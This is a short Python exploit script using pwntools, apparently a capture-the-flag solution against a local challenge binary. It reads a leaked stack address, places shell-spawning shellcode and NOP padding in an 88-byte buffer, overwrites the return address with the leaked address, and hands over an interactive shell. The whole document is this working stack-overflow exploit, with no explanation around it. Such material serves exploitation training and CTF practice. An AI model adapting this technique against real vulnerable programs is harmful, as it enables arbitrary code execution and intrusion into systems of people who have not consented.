23 lines
364 B
Python
23 lines
364 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./chall", checksec=False)
|
|
r = process()
|
|
|
|
# funcs
|
|
s = lambda a: r.sendline(a)
|
|
|
|
# leak
|
|
r.recvuntil(b": ")
|
|
stack_addr = int(r.recvline(), 16)
|
|
log.info("stack_addr: %#x", stack_addr)
|
|
|
|
# buf
|
|
sc = asm(shellcraft.sh())
|
|
sc += b"\x90"*(88-len(sc))
|
|
buf = sc
|
|
buf += p64(stack_addr)
|
|
s(buf)
|
|
|
|
r.interactive() |